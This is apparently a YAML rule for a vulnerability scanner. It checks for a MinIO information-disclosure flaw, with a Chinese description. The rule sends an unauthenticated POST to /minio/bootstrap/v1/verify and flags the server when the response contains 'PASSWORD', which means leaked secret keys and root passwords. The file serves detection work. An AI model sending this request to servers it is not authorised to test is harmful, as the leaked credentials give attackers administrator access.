31 lines
819 B
YAML
31 lines
819 B
YAML
|
keyword: minio
|
|||
|
|
name: MinIO信息泄露漏洞
|
|||
|
|
description: |
|
|||
|
|
在集群部署的Minio中,未授权的攻击者可发送恶意的HTTP请求来获取Minio环境变量中的敏感信息(MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD),可能导致攻击者以管理员权限登录Minio。
|
|||
|
|
requests: # 为空代表默认或者不启用
|
|||
|
|
path: "/minio/bootstrap/v1/verify"
|
|||
|
|
method: POST
|
|||
|
|
headers:
|
|||
|
|
User-agent:
|
|||
|
|
Content-length:
|
|||
|
|
Accept:
|
|||
|
|
Content-type:
|
|||
|
|
Accept-Encoding:
|
|||
|
|
Cookie:
|
|||
|
|
Referer:
|
|||
|
|
X-Forwarded-For:
|
|||
|
|
body-raw: |-
|
|||
|
|
|
|||
|
|
response:
|
|||
|
|
path: ""
|
|||
|
|
status-code: 200
|
|||
|
|
body: "PASSWORD" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息
|
|||
|
|
headers:
|
|||
|
|
Server:
|
|||
|
|
Content-type:
|
|||
|
|
Content-length:
|
|||
|
|
Date:
|
|||
|
|
Connection:
|
|||
|
|
impact: |
|
|||
|
|
泄露系统账号密码
|